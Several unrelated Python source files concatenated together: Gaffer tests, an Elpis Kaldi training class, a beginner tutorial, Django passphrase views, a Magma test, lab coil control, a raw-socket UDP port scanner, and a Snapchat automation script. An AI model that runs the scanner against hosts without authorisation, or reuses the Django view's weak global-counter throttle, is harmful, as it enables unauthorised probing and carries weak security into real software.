c.removeMatching( "a* c*" )
self.assertNotEqual( c.hash(), h )
self.assertEqual( set( c.names() ), set( [ "b_1", "b_2", "frame", "framesPerSecond" ] ) )
h = c.hash()
def testContains( self ) :
c = Gaffer.Context()
self.assertFalse( "a" in c )
self.assertTrue( "a" not in c )
c["a"] = 1
self.assertTrue( "a" in c )
self.assertFalse( "a" not in c )
del c["a"]
self.assertFalse( "a" in c )
self.assertTrue( "a" not in c )
def testTime( self ) :
c = Gaffer.Context()
self.assertEqual( c.getFrame(), 1.0 )
self.assertEqual( c.getFramesPerSecond(), 24.0 )
self.assertAlmostEqual( c.getTime(), 1.0 / 24.0 )
c.setFrame( 12.0 )
self.assertEqual( c.getFrame(), 12.0 )
self.assertEqual( c.getFramesPerSecond(), 24.0 )
self.assertAlmostEqual( c.getTime(), 12.0 / 24.0 )
c.setFramesPerSecond( 48.0 )
self.assertEqual( c.getFrame(), 12.0 )
self.assertEqual( c.getFramesPerSecond(), 48.0 )
self.assertAlmostEqual( c.getTime(), 12.0 / 48.0 )
def testEditableScope( self ) :
GafferTest.testEditableScope()
def testCanceller( self ) :
c = Gaffer.Context()
c["test"] = 1
self.assertEqual( c.canceller(), None )
canceller = IECore.Canceller()
cc = Gaffer.Context( c, canceller )
self.assertEqual( cc["test"], 1 )
self.assertTrue( cc.canceller() is not None )
canceller.cancel()
with self.assertRaises( IECore.Cancelled ) :
IECore.Canceller.check( cc.canceller() )
if __name__ == "__main__":
unittest.main()
|
model.py
|
import os
import re
import shutil
from pathlib import Path
from typing import Callable, Dict, Tuple
import threading
from elpis.engines.common.objects.command import run
from elpis.engines.common.objects.model import Model as BaseModel
from elpis.engines.common.objects.dataset import Dataset
from elpis.engines.common.objects.pron_dict import PronDict
from elpis.engines.kaldi.input.json_to_kaldi import create_kaldi_structure
from elpis.engines.common.objects.path_structure import PathStructure
from collections import OrderedDict
from subprocess import CalledProcessError
from jinja2 import Template
class KaldiModel(BaseModel): # TODO not thread safe
# _links = {**Model._links, **{"pron_dict": PronDict}}
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.pron_dict: PronDict = None
self.config['pron_dict_name'] = None # pron_dict hash has not been linked
self.config['ngram'] = 1 # default to 1 to make playing quicker
self.config['engine_name'] = 'kaldi'
stage_names = {
"0_setup.sh": "setup",
"1_prep_acoustic.sh": "acousticPreparation",
"2_feature_ext.sh": "featureExtraction",
"3_prep_lang_data.sh": "dataPreparation",
"4_lang_model_cr.sh": "modelCreation",
"5_mono.sh": "monophoneTraining",
"6_tri1.sh": "triphoneTraining"
}
super().build_stage_status(stage_names)
@classmethod
def load(cls, base_path: Path):
self = super().load(base_path)
self.pron_dict = None
return self
def link_pron_dict(self, pron_dict: PronDict):
self.pron_dict = pron_dict
self.config['pron_dict_name'] = pron_dict.name
@property
def ngram(self) -> int:
return int(self.config['ngram'])
@ngram.setter
def ngram(self, value: int) -> None:
self.config['ngram'] = value
def build_structure(self):
# task json-to-kaldi
output_path = self.path.joinpath('output')
output_path.mkdir(parents=True, exist_ok=True)
# Copy cleaned corpus from dataset to the model
dataset_corpus_txt = self.dataset.path.joinpath('cleaned', 'corpus.txt')
model_corpus_txt = self.path.joinpath('corpus.txt')
if os.path.exists(dataset_corpus_txt):
shutil.copy(f"{dataset_corpus_txt}", f"{model_corpus_txt}")
create_kaldi_structure(
input_json=f'{self.dataset.pathto.annotation_json}',
output_folder=f'{output_path}',
silence_markers=False,
corpus_txt=f'{model_corpus_txt}'
)
def train(self, on_complete:Callable=None):
def prepare_for_training():
print("prepare_for_training")
# task make-kaldi-subfolders
kaldi_structure = PathStructure(self.path)
local_kaldi_path = self.path.joinpath('kaldi')
local_kaldi_path.mkdir(parents=True, exist_ok=True)
kaldi_data_local_dict = local_kaldi_path.joinpath('data', 'local', 'dict')
kaldi_data_local_dict.mkdir(parents=True, exist_ok=True)
kaldi_data_local = local_kaldi_path.joinpath('data', 'local')
kaldi_data_local.mkdir(parents=True, exist_ok=True)
kaldi_data_test = local_kaldi_path.joinpath('data', 'test')
kaldi_data_test.mkdir(parents=True, exist_ok=True)
kaldi_data_train = local_kaldi_path.joinpath('data', 'train')
kaldi_data_train.mkdir(parents=True, exist_ok=True)
kaldi_conf = local_kaldi_path.joinpath('conf')
kaldi_conf.mkdir(parents=True, exist_ok=True)
kaldi_local = local_kaldi_path.joinpath('local')
kaldi_local.mkdir(parents=True, exist_ok=True)
# copy the pron dict
shutil.copy(f"{self.pron_dict.lexicon_txt_path}", f"{kaldi_data_local_dict.joinpath('lexicon.txt')}")
# task generate-kaldi-configs
path_file_path = kaldi_structure.path.joinpath('path.sh')
mfcc_file_path = kaldi_structure.conf.joinpath('mfcc.conf')
decode_config_file_path = kaldi_structure.conf.joinpath('decode.config')
template_path = Path('/elpis/elpis/engines/kaldi/templates')
path_resource = template_path.joinpath('path.sh')
mfcc_resource = template_path.joinpath('mfcc.conf')
decode_config_resource = template_path.joinpath('decode.config')
# task make-nonsil-phones > {{ .KALDI_OUTPUT_PATH }}/tmp/nonsilence_phones.txt
nonsilence_phones_path = kaldi_data_local_dict.joinpath('nonsilence_phones.txt')
# build a unique, non-sorted list of the phone symbols
# can't use sorting, because the rules may have order significance
# ignore comment lines that begin with #
seen = OrderedDict()
for line in open(self.pron_dict.l2s_path, "r"):
if line[0] == "#":
pass
else:
line = line.split()[1:]
if len(line) > 0:
line = line[0]
seen[line] = seen.get(line, 0) + 1
with nonsilence_phones_path.open(mode='w') as fout:
for (item, i) in seen.items():
fout.write("%s\n" % item)
with path_file_path.open(mode='w') as fout:
with path_resource.open() as fin:
content = Template(fin.read()).render(
{
'KALDI_ROOT': '/kaldi',
'HELPERS_PATH': '/kaldi-helpers',
'CORPUS_PATH': f'..{self.dataset.pathto.original}'
}
)
fout.write(content)
with mfcc_file_path.open(mode='w') as fout:
with mfcc_resource.open() as fin:
content = Template(fin.read()).render(
{
'MFCC_SAMPLE_FREQUENCY': '44100',
'MFCC_FRAME_LENGTH': '25',
'MFCC_LOW_FREQ': '20',
'MFCC_HIGH_FREQ': '22050',
'MFCC_NUM_CEPS': '7',
}
)
fout.write(content)
with decode_config_file_path.open(mode='w') as fout:
with decode_config_resource.open() as fin:
content = Template(fin.read()).render(
{
'DECODE_BEAM': '11.0',
'DECODE_FIRST_BEAM': '8.0'
}
)
fout.write(content)
try:
# task copy-generated-files
output_path = self.path.joinpath('output')
output_path.mkdir(parents=True, exist_ok=True)
# - cp {{ .KALDI_OUTPUT_PATH }}/tmp/json_splitted/training/corpus.txt {{ .KALDI_OUTPUT_PATH }}/kaldi/data/local/
shutil.move(f"{output_path.joinpath('training', 'corpus.txt')}", f"{kaldi_data_local}")
shutil.move(f"{output_path.joinpath('testing', 'segments')}", f"{kaldi_data_test.joinpath('segments')}")
shutil.move(f"{output_path.joinpath('testing', 'text')}", f"{kaldi_data_test.joinpath('text')}")
shutil.move(f"{output_path.joinpath('testing', 'utt2spk')}", f"{kaldi_data_test.joinpath('utt2spk')}")
shutil.move(f"{output_path.joinpath('testing', 'wav.scp')}", f"{kaldi_data_test.joinpath('wav.scp')}")
shutil.move(f"{output_path.joinpath('training', 'segments')}", f"{kaldi_data_train.joinpath('segments')}")
shutil.move(f"{output_path.joinpath('training', 'text')}", f"{kaldi_data_train.joinpath('text')}")
shutil.move(f"{output_path.joinpath('training', 'utt2spk')}", f"{kaldi_data_train.joinpath('utt2spk')}")
shutil.move(f"{output_path.joinpath('training', 'wav.scp')}", f"{kaldi_data_train.joinpath('wav.scp')}")
# task copy-phones-configs
optional_silence_file_path = kaldi_data_local_dict.joinpath('optional_silence.txt')
silence_phones_file_path = kaldi_data_local_dict.joinpath('silence_phones.txt')
with optional_silence_file_path.open(mode='w') as fout:
fout.write('SIL\n')
with silence_phones_file_path.open(mode='w') as fout:
fout.write('SIL\nsil\nspn\n')
shutil.copy(f"{template_path.joinpath('cmd.sh')}", f"{local_kaldi_path}")
shutil.copytree(f"{template_path.joinpath('stages')}", local_kaldi_path.joinpath('stages'))
for file in os.listdir(local_kaldi_path.joinpath('stages')):
os.chmod(local_kaldi_path.joinpath('stages').joinpath(file), 0o774)
shutil.copy(f"{template_path.joinpath('score.sh')}", f"{kaldi_local}")
run(f"cp -L -r /kaldi/egs/wsj/s5/steps {local_kaldi_path}/steps")
run(f"cp -L -r /kaldi/egs/wsj/s5/utils {local_kaldi_path}/utils")
# modified extract-wavs
for audio_file in os.listdir(self.dataset.pathto.resampled):
src = f'{self.dataset.pathto.resampled.joinpath(audio_file)}'
dst = f'{local_kaldi_path}'
shutil.copy(src, dst)
print('kaldi dirs preparation done.')
except OSError as error:
print("couldn't prepare kaldi dirs: ", error)
def train():
local_kaldi_path = self.path.joinpath('kaldi')
# Prepare (dump, recreate) main train log file
run_log_path = self.path.joinpath('train.log')
if os.path.isfile(run_log_path):
os.remove(run_log_path)
run(f"touch {run_log_path};")
# Organise stage logs in a dir
train_log_dir = self.path.joinpath('train-logs')
if os.path.exists(train_log_dir):
shutil.rmtree(train_log_dir)
os.mkdir(train_log_dir)
stage_count = 0
stages = os.listdir(local_kaldi_path.joinpath('stages'))
for stage in sorted(stages):
print(f"Stage {stage} starting")
self.stage_status = (stage, 'in-progress', '', 'starting')
# Create log file
stage_log_path = self.path.joinpath(os.path.join(train_log_dir, f'stage_{stage_count}.log'))
with open(stage_log_path, 'w+'):
pass
# Manipulate stage templates with user-defined settings
# TODO replace with jinja templates or something similar
with open(local_kaldi_path.joinpath('stages').joinpath(stage), 'r') as file :
filedata = file.read()
# Add settings to replace here
filedata = filedata.replace('lm_order=1', f'lm_order={self.ngram}')
with open(local_kaldi_path.joinpath('stages').joinpath(stage), 'w') as file:
file.write(filedata)
# Run the command, log output. Also redirect Kaldi stderr output to the log. These are often not errors :-(
try:
stage_process = run(f"cd {local_kaldi_path}; stages/{stage} >> {stage_log_path}")
with open(stage_log_path, 'a+') as file:
print('stdout', stage_process.stdout, file=file)
print('stderr', stage_process.stderr, file=file)
print('done', file=file)
print(f"Stage {stage} complete")
stage_log = stage_process.stdout + "\n" + stage_process.stderr
print(f"Stage {stage} log", stage_log)
self.stage_status = (stage, 'complete', '', stage_log)
# add to stage_log
stage_count = stage_count + 1
except CalledProcessError as error:
with open(stage_log_path, 'a+') as file:
print('stderr', error.stderr, file=file)
print('failed', file=file)
print(f"Stage {stage} failed")
self.stage_status = (stage, 'failed', '', 'LOG-C')
break
self.log = ''
# Concat all the files in the train-log dir
log_filenames = os.listdir(train_log_dir)
log_filenames.sort()
with open(run_log_path, 'w') as outfile:
for log_file in log_filenames:
with open(os.path.join(train_log_dir, log_file)) as infile:
log_contents = infile.read()
outfile.write(log_contents)
outfile.write("\n")
self.log += log_contents
def run_training_in_background():
def background_train_task():
prepare_for_training()
train()
self.status = 'trained'
on_complete()
self.status = 'training'
t = threading.Thread(target=background_train_task)
t.start()
if on_complete is None:
self.status = 'training'
prepare_for_training()
train()
self.status = 'trained'
else:
run_training_in_background()
return
def get_train_results(self):
log_file = self.path.joinpath('train.log')
results = {}
with log_file.open() as fin:
wer_lines = []
for line in reversed(list(fin)):
line = line.rstrip()
if "%WER" in line:
# use line to sort by best val
line_r = line.replace('%WER ', '')
wer_lines.append(line_r)
wer_lines.sort(reverse = True)
line = wer_lines[0]
line_split = line.split(None, 1)
wer = line_split[0]
line_results = line_split[1]
line_results = re.sub("[\[\]]", "", line_results)
results_split = line_results.split(',')
count_val = results_split[0].strip()
ins_val = results_split[1].replace(' ins', '').strip()
del_val = results_split[2].replace(' del', '').strip()
sub_val = results_split[3].replace(' sub', '').strip()
results = {'wer': wer, 'count_val': count_val, 'ins_val': ins_val, 'del_val': del_val,
'sub_val': sub_val}
print(results)
return results
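# --- illustrative usage sketch (not part of the original module; paths and objects are assumed) ---
#   model = KaldiModel.load(Path("/state/of/models/some-model"))   # hypothetical location
#   model.link_pron_dict(pron_dict)                                # a previously built PronDict
#   model.ngram = 3
#   model.build_structure()
#   model.train(on_complete=lambda: print("training finished"))
#   results = model.get_train_results()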
|
0-5. pythonbasic-2.py
|
# python basic -2
# adding
a = 1
b = 2
c = a+b
print(c)
# if-else statements
if a > 0:
print("a>0")
else:
print("a<0")
# import library
import math
n = math.sqrt(16.0)
print(n)
# data type
print(int(3.5),2e3,float("1.6"),float("inf"),float("-inf"),bool(0),bool(-1),bool("False"))
# complex number
v = 2 + 3j
print(v.real,v.imag)
a = [1,2,3,4]
b = 3 in a
print(b)#True
# String
a = "ABC"
b = a
print(a is b)#True
# Print
print("name: %s ages: %d" % ("John",16))
print("number = %0.4f, number2 = %10.5f" % (3.141592,3.141592))
# String
s = "Hello"
print(type(s),s[1])
s = '.'.join(['AB','CD','DF'])
print(s)
s = ' '.join(['AB','CD','EF'])
print(s)
items = 'AB,CD,EF'.split(',')
print(items)
s = "Name:{0}, Age:{1}".format("John",10)
print(s)
s = "Name:{name},Age:{age}".format(name="John",age=10)
print(s)
area = (10,20)
s = "width: {x[0]}, height {x[1]}".format(x = area)
print(s)
# list and for loop
list1 = ["AB","CD","EF"]
for s in list1:
print(s)
sum = 0
for i in range(101):#0~100
sum += i
print(sum)
a = []
a = ["AB",10,False]
x = a[1]
a[1] = "Good"
y = a[-1]
print(x,a[1],y)
# Merge
a = [1,2]
b = [3,4,5]
c = a+b
print(c)
d = a*3
print(d)
# list search
list1 = "the john is the good man".split()
a = list1.index('john')# 1
n = list1.count('the')# 2
print(a,n)
# list comprehension
list1 = [n ** 3 for n in range(10) if n % 2 == 0]
print(list1)
# Tuple
name = ("Kim","Park")
print(name)
firstname,lastname=name
print(lastname,',',firstname)
# Dictionary
scores = {"kim":100,"Park":90}
v = scores["kim"]
scores["Park"]= 95
print(scores)
scores["Lee"]=100
del scores["kim"]
print(scores)
for a in scores:
val = scores[a]
print("%s : %d" % (a,val))
keys = scores.keys()
for k in keys:
print(k)
values = scores.values()
for v in values:
print(v)
scores.update({"Park":100,"Lee":80})
print(scores)
# Set
our_set = {'True','False','True','True'}
s = set(our_set)
print(s)
num_set = {1,2,3,4,5}
num_set.add(10)
print(num_set)
num_set.update({15,20,25})
print(num_set)
num_set.remove(1)
print(num_set)
num_set.clear()
print(num_set)
a = {1,2,3}
b = {3,4,5}
i = a & b
print(i)
u = a | b
print(u)
d = a-b
print(d)
# Class
class rectangle:
count = 0
def __init__(self,width,height):
self.width = width
self.height = height
rectangle.count +=1
def calculation(self):
area = self.width*self.height
return area
def square_s(width,height):
return width == height
square = rectangle.square_s(5,5)
square_1 = rectangle(5,5)
print(square,square_1.calculation())
# Thread
import threading
def sum(low,high):
total = 0
for i in range(low,high):
total += i
print("Subthread, ",total)
t = threading.Thread(target=sum,args=(1,10000))
t.start()
print("Main Thread ")
|
views.py
|
from django.conf import settings
from django.contrib.auth import logout as logout_func
from django.http import HttpResponseRedirect
from django.shortcuts import render, redirect
from django.contrib import messages, auth
from django.contrib.auth.models import User
from django.urls import reverse
from accounts.models import AuthToggle,PassPhrase
import time
import threading
def register(request):
if request.method == "POST":
# Get form values
# first_name = request.POST['first_name']
# last_name = request.POST['last_name']
username = request.POST['username']
email = request.POST['email']
password = request.POST['password']
password2 = request.POST['password2']
# Check if passwords match
if password == password2:
if User.objects.filter(username=username).exists():
messages.error(request, 'That username is taken.')
return redirect('register')
else:
if User.objects.filter(email=email).exists():
messages.error(
request, 'That email is already being used.')
return redirect('register')
else:
# approved
user = User.objects.create_user(
username=username,
password=password,
email=email,
# first_name=first_name,
# last_name=last_name
)
# Login after register
''' auth.login(request, user)
messages.success(request, "You are now logged in")
return redirect('index')'''
user.save()
messages.success(
request, "You are now registered and can now log in")
return redirect('login')
else:
messages.error(request, 'Passwords do not match')
return redirect('register')
else:
return render(request, 'accounts/register.html')
'''
def login(request):
if request.method == "POST":
username = request.POST['username']
password = request.POST['password']
user = auth.authenticate(username=username, password=password)
if user is not None:
auth.login(request, user)
messages.success(request, 'You are now logged in!')
return redirect('dashboard')
else:
messages.error(request, 'Invalid credentials')
return redirect('login')
else:
return render(request, 'accounts/login.html')
'''
'''def dashboard(request):
return render(request, 'landings/portal.html')'''
global attempts, maxAttempts, enableTimer
attempts = 0
maxAttempts = 10
enableTimer = False
def index(request):
create_user_if_not_exists()
if request.method == "POST":
passphrase = request.POST.get('passphrase')
gateway = False
protection = AuthToggle.objects.first().enable_protection
global attempts, maxAttempts, enableTimer
if passphrase:
# check for all passphrase values in the database
for x in PassPhrase.objects.all().values():
if passphrase == x['passphrase'] and protection and not enableTimer:
gateway = True
break
if gateway:
return redirect('portal')
else:
attempts += 1
def start_timeout():
global attempts, enableTimer
messages.error(request, 'Timeout Reached: you have made ' + str(attempts) + ' attempts, please wait 1 hour to continue')
# Time in seconds
time.sleep(3600) # 3600 seconds = 1 hr, 60 seconds = 1 min
attempts = 0
enableTimer = False
t1 = threading.Thread(target=start_timeout)
if attempts >= maxAttempts and not enableTimer:
t1.start()
enableTimer = True
elif enableTimer:
messages.error(request, 'Timeout Reached: please wait 1 hour to continue')
else:
messages.error(request, 'Invalid credentials. Attempts left: ' + str(maxAttempts - attempts))
return render(request, 'landings/gateway.html')
else:
return render(request, 'landings/gateway.html')
def portal(request):
context = {
"protection": AuthToggle.objects.first()
}
return render(request, 'landings/portal.html', context)
def logout(request):
global attempts
attempts = 0
return redirect('index')
def pending(request):
return render(request, 'accounts/pending.html')
def reset(request):
# used when a user forgets his or her password and chooses a new one
return render(request, 'accounts/reset.html')
|
metrics_export_test.py
|
"""
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import threading
import unittest
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib import parse
from integ_tests.cloud.cloud_manager import CloudManager
from integ_tests.cloud.fixtures import GATEWAY_ID, NETWORK_ID
from integ_tests.gateway.rpc import get_gateway_hw_id
class TestHTTPServerRequestHandler(BaseHTTPRequestHandler):
def do_POST(self):
print("Received metric export POST request")
# Get post body
request_headers = self.headers
length = int(request_headers.get_all('content-length')[0])
post_body = self.rfile.read(length)
post_body_dict = parse.parse_qs(parse.unquote(post_body.decode('utf-8')))
# Sanity check request, make sure it has the key 'datapoints'
assert(len(post_body_dict['datapoints'][0]) > 0)
print("Metrics export valid")
# Send success response to cloud
self.send_response(200)
self.send_header('content-type', 'application/json')
self.end_headers()
self.wfile.write(bytes('"success"', 'utf-8'))
return
class TestMetricsExport(unittest.TestCase):
"""
Runs a test case which starts a mock metrics server (in this case, ODS)
on a set IP and port and waits for gateway metrics to export via the cloud.
"""
TEST_VM_IP = '192.168.60.141'
TEST_VM_PORT = 8081
METRIC_TIMEOUT = 120 # 2 minutes
def setUp(self):
self._cloud_manager = CloudManager()
self._cloud_manager.delete_networks([NETWORK_ID])
self._cloud_manager.create_network(NETWORK_ID)
self._cloud_manager.register_gateway(
NETWORK_ID, GATEWAY_ID,
get_gateway_hw_id(),
)
self._test_server = HTTPServer(
(self.TEST_VM_IP, self.TEST_VM_PORT),
TestHTTPServerRequestHandler,
)
self._server_thread = threading.Thread(target=self.run_server)
self._server_thread.daemon = True
def tearDown(self):
self._test_server.socket.close()
self._cloud_manager.clean_up()
def handle_timeout(self):
self.assertTrue(
False,
"Metrics not received before timeout, test failed",
)
def run_server(self):
self._test_server.timeout = self.METRIC_TIMEOUT
self._test_server.handle_timeout = self.handle_timeout
self._test_server.handle_request()
def test_metrics_export(self):
print("Starting test server, waiting for metrics export...")
self._server_thread.start()
self._server_thread.join()
print("Metrics exported successfully")
if __name__ == "__main__":
unittest.main()
|
xyzFieldControl.py
|
import threading
import time
import sys
import math
import uncertainties as u
from labjack import ljm # import labjack library
# now import the modules that are part of the repo
import powercontrol.coil as coil
def openPorts():
"""Open all the ports including the labjack and the powersupplies"""
# open the powersupply serial ports
xCoil.supply.openPort()
yCoil.supply.openPort()
#zCoil.supply.openPort()
print('opened all three powersupplies')
# open the labjack serial port
handle = ljm.open(ljm.constants.dtANY, ljm.constants.ctANY, "ANY")
# print the labjack info
info = ljm.getHandleInfo(handle)
print("Opened a LabJack with Device type: %i, Connection type: %i,\n"
"Serial number: %i, IP address: %s, Port: %i,\nMax bytes per MB: %i" %
(info[0], info[1], info[2], ljm.numberToIP(info[3]), info[4], info[5]))
return handle # return the handle so we can close it later
def closePorts(handle):
"""close all the ports including the labjack and the powersupplies"""
# pass in the labjack handle so we don't have to open it on import
xCoil.supply.closePort()
yCoil.supply.closePort()
#zCoil.supply.closePort()
print('closed all three powersupplies')
ljm.close(handle)
print('closed labjack')
return
# define field setting functions
# old non-threading field function.
'''
def fine_field_cart(xField, yField, zField, handle):
"""
Set powersupplies to the proper current for each coil
and set the DACs to the correct voltage with the labjack.
"""
xCoil.setField(xField)
yCoil.setField(yField)
zCoil.setLargeCoilField(zField)
# now adust the adustment coils with the labjack
# Setup and call eWriteNames to write values to the LabJack.
numFrames = 2
names = [xCoil.dacName, yCoil.dacName]
analogValues = [xCoil.dacVoltage, yCoil.dacVoltage] # [2.5 V, 12345]
ljm.eWriteNames(handle, numFrames, names, analogValues)
return
'''
def fine_field_cart(xField, yField, zField, handle):
"""
Set powersupplies to the proper current for each coil
and set the DACs to the correct voltage with the labjack.
"""
t0 = time.time()
# create the thread objects to handle the serial wait times
xThread = threading.Thread(target=xCoil.setField, args=[xField])
yThread = threading.Thread(target=yCoil.setField, args=[yField])
zThread = threading.Thread(target=zCoil.setLargeCoilField, args=[zField])
# start the threads()
xThread.start()
yThread.start()
zThread.start()
# now adjust the adjustment coils with the labjack
# Setup and call eWriteNames to write values to the LabJack.
numFrames = 2
names = [xCoil.dacName, yCoil.dacName]
analogValues = [xCoil.dacVoltage, yCoil.dacVoltage] # [2.5 V, 12345]
ljm.eWriteNames(handle, numFrames, names, analogValues)
# wait for the threads to finish before moving on
# (prevent thread duplication in an additional call)
xThread.join()
yThread.join()
zThread.join()
t1 = time.time()
#print('total time between = %s' % (t1-t0))
#print('total time between = {0}'.format(t1-t0)) #
def field_cart(xField, yField, zField):
"""
Coarsely set the coils using the large power supplies only
(avoid using the adjustment coils).
"""
xCoil.setLargeCoilField(xField)
yCoil.setLargeCoilField(yField)
zCoil.setLargeCoilField(zField)
return
# rotate the coordinate system to allow us to input field values perpendicular
# to the optical zero.
def fine_field_cart_rotation(xField, yField, zField, phi, handle):
"""
Rotate the coordinate system about the z axis
so we can align our control components to be perpendicular
and parallel to the optical zero.
"""
# do a rotation about the z axis.
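# equivalent matrix form of the rotation applied below:
#   [x']   [ cos(phi)   sin(phi)] [x]
#   [y'] = [-sin(phi)   cos(phi)] [y]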
xFieldPrime = xField * math.cos(phi) + yField * math.sin(phi)
yFieldPrime = yField * math.cos(phi) - xField * math.sin(phi)
fine_field_cart(xFieldPrime, yFieldPrime, zField, handle)
return
'''def pid_duration(kP, kI, kD, durationInSeconds, labjackHandle):
startTime = time.time() # time stamp to start the clock
# load in the field values for the coils
xField = self.'''
def main():
# calibration predefines
xFieldGain = u.ufloat(42.24e-6, 0.08e-6) # T/A
yFieldGain = u.ufloat(45.99e-6, 0.09e-6) # T/A
zFieldGain = u.ufloat(132.16e-6, 0.08e-6) # T/A
# field-to-current gain for the adjustment coils, which is
# extrapolated from the large coil calibration.
xAFieldGain = xFieldGain / 25 # T/A
yAFieldgain = yFieldGain / 20 # T/A
# instantiate the coil objects.
xCoil = coil.Coil('/dev/tty.usbserial-FTBZ1G1B', xFieldGain)
yCoil = coil.Coil('/dev/tty.usbserial-FTBYZZIN', yFieldGain)
zCoil = coil.Coil('/dev/tty.usbserial-FTFBPHDT', zFieldGain)
if __name__ == '__main__':
main()
|
udpScanner.py
|
#!/usr/bin/env python
# coding: utf-8
# In[23]:
import socket
import time
import struct
import threading
import argparse
import logging
logger = logging.getLogger()
logger.setLevel(logging.INFO)
formats = logging.Formatter('%(asctime)s [%(message)s]', '%m/%d/%Y %I:%M:%S:%p')
console = logging.StreamHandler()
console.setFormatter(formats)
logger.addHandler(console)
parser = argparse.ArgumentParser()
parser.add_argument('--IP', type=str, default='127.0.0.1',
help='IP you want to scan, default:127.0.0.1')
parser.add_argument('--w', type=str, default='all',
help='select the way you want to scan:\nall: scan all the ports.\none: scan just the one port given. default: all')
parser.add_argument('--p', type=int, default=2333,
help='the port you want to scan(less than 65536),default:2333')
args = parser.parse_args()
# In[24]:
def udpMessageSender(ip, port):
while True:
try:
sockUdp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sockUdp.sendto(b"Hello world!", (ip, port))  # payload must be bytes
sockUdp.close()
break
except:
print("Fail to send the udp message, try again")
time.sleep(1)
continue
# In[25]:
def icmpMessageReceiver(ip, port):
try:
sockIcmp = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
except:
print("You should run as root user")
return
sockIcmp.settimeout(5)
while True:
try:
packet, addr = sockIcmp.recvfrom(65536)
icmpHead = packet[20:28]
headType, code, checksum, packetID, sequence = struct.unpack(
"bbHHh",icmpHead
)
break
except:
print("the port:%s on %s is opened" %(port, ip))
return
sockIcmp.close()
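# ICMP type 3 is "destination unreachable": code 3 (port unreachable) means the UDP
# port is closed, while codes 1, 2, 9, 10 and 13 mean the probe was filtered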
if code == 3 and headType == 3 and addr[0] == ip:
print("the port:%s on %s is closed" %(port, ip))
elif code in [1, 2, 9, 10, 13] and headType == 3 and addr[0] == ip:
print("the port:%s on %s is filted" %(port, ip))
return
# In[26]:
def udpScanPort(ip, port):
icmpReceiveThread = threading.Thread(target=icmpMessageReceiver, args=(ip, port))
icmpReceiveThread.daemon = True
icmpReceiveThread.start()
time.sleep(0.2)
udpMessageSender(ip, port)
time.sleep(0.2)
icmpReceiveThread.join()
return
# In[27]:
if __name__ == '__main__':
if args.IP and args.w == 'one' and args.p < 65536:
udpScanPort(args.IP, args.p)
elif args.IP and args.w == 'all':
for item in range(130, 141):
udpScanPort(args.IP, item)
# In[ ]:
|
skeleton.py
|
import random
import threading
import time
from datetime import datetime
from ppadb.client import Client as AdbClient
from ppadb.device import Device
from .ocr import find_last_snap
client = AdbClient(host="127.0.0.1", port=5037)
def sleep_after_exec(func):
def wrapper(*args, **kwargs):
func(*args, **kwargs)
time.sleep(0.9)
return wrapper
def get_resolution(device):
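# "adb shell wm size" typically prints something like "Physical size: 1080x1920",
# so the third whitespace-separated token carries the WIDTHxHEIGHT string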
return tuple(
[int(x) for x in str(device.shell("wm size")).split(" ")[2].replace("\n", "").split("x")])
def log(string):
print(f'[{datetime.utcnow().strftime("%H:%M:%S.%f")[:-3]}]: {string}')
@sleep_after_exec
def open_snapchat(device):
"""
used: adb shell pm dump PACKAGE_NAME | grep -A 1 MAIN to find the activity for com.snapchat.android
"""
log(f"{device.get_serial_no()}: Opening Snapchat")
device.shell("am start -n com.snapchat.android/.LandingPageActivity")
def go_to_homepage(device):
log(f"{device.get_serial_no()}: Going Back Home")
device.shell("am start -a android.intent.action.MAIN -c android.intent.category.HOME")
@sleep_after_exec
def click_picture(width, height, device):
x = width / 2
y = height - height / 8
log(f"{device.get_serial_no()}: Clicking Camera at {x},{y}")
device.input_tap(x, y)
@sleep_after_exec
def click_video(width, height, device):
x = width / 2
y = height - height / 8
log(f"{device.get_serial_no()}: Clicking Video at {x},{y}")
device.input_swipe(x, y, x, y, 10000)
@sleep_after_exec
def send_picture(width, height, device):
x = width - width / 16
y = height - height / 16
log(f"{device.get_serial_no()}: Clicking Send at {x},{y}")
device.input_tap(x, y)
@sleep_after_exec
def click_random_filter(width, height, device):
if random.randint(1, 2) == 1:
device.input_swipe(width - 100, height / 2, 100, 1700, 150)
else:
device.input_swipe(100, height / 2, width - 100, 1700, 150)
@sleep_after_exec
def click_last_snap(device, last_snap_x, last_snap_y):
log(f"{device.get_serial_no()}: Clicking Last Send at {last_snap_x},{last_snap_y}")
device.input_tap(last_snap_x, last_snap_y)
def capture_screen(device):
result = device.screencap()
with open(f"{device.get_serial_no()}-screen.png", "wb") as fp:
fp.write(result)
#
# def click_all_people(dev_width, dev_height, device, recents_y):
# x = 90
# y = recents_y + 90
# threshold = 45
# log(f"{device.get_serial_no()}: Clicking All Recents from {100},{recents_y}")
# for i in range(60):
# log("Tap")
# device.input_tap(x, y)
# y += 90
def streak_on_device(picture, device: Device):
dev_width, dev_height = get_resolution(device)
open_snapchat(device)
if picture:
click_picture(dev_width, dev_height, device)
click_random_filter(dev_width, dev_height, device)
else:
click_video(dev_width, dev_height, device)
send_picture(dev_width, dev_height, device)
capture_screen(device)
log(f"{device.get_serial_no()}: Finding Last Snap")
(x, y, recents_y) = find_last_snap(device.get_serial_no())
if x == -1:
log(f"{device.get_serial_no()}: Last Snap NOT FOUND")
else:
log(f"{device.get_serial_no()}: Last Snap FOUND")
click_last_snap(device, x, y)
send_picture(dev_width, dev_height, device)
go_to_homepage(device)
def streak_call(picture: bool):
for device in client.devices():
log(f"Working on {device}")
threading.Thread(target=streak_on_device, args=(picture, device)).start()
def main():
log("Press V for Video, C for Picture and Q for Quiting the tool")
while True:
listening_char = input()
if listening_char == "V" or listening_char == "v":
streak_call(picture=False)
elif listening_char == "C" or listening_char == "c":
streak_call(picture=True)
elif listening_char == "Q" or listening_char == "q":
exit()
else:
log("Wrong Entry! Try again")
def run():
"""Entry point for console_scripts
"""
main()
if __name__ == "__main__":
run()
|
training.py
|
from . import data
from . import utils
import logging
import time
import queue
import threading
import copy
class GeneratorEnqueuer(data.BatchGenerator):
"""Builds a queue out of a data generator.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
generator: a generator function which endlessly yields data
"""
